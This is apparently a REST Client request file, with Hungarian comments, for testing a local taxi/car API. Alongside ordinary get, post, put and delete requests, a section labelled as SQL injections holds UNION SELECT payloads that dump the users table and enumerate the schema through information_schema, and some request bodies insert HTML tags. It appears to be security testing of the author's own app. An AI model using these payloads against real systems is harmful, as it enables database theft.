
### get all cars
get http://localhost:3000/cars


### get car by id
get http://localhost:3000/cars/10022


### sql injections
### get users tábla információk
get http://localhost:3000/cars/2 UNION SELECT *, '' FROM users

### get mi az adatbázis neve
get http://localhost:3000/cars/2  UNION SELECT database(), '','',''

### get milyen táblák vannak
get http://localhost:3000/cars/222  UNION select table_name, '','','' from information_schema.tables where table_schema='taxi6'

### get milyen oszlopai vannak a users táblának
get http://localhost:3000/cars/222 UNION select column_name,'', '','' from information_schema.columns where table_name='users' and table_schema='taxi6'

### post car
post http://localhost:3000/cars
Content-Type: application/json

{
    "name": "Trabant <h2>valami</h2>",
    "licenceNumber": "TT809",
    "hourlyRate": "20036 éélkjéklj"
}

### delete car by id
delete http://localhost:3000/cars/1002

### put car
put http://localhost:3000/cars/1002
Content-Type: application/json

{
    "name": "<h1>Trabant3</h1>",
    "licenceNumber": "TT809",
    "hourlyRate": 20036
}


###
### get all trips
get http://localhost:3000/trips

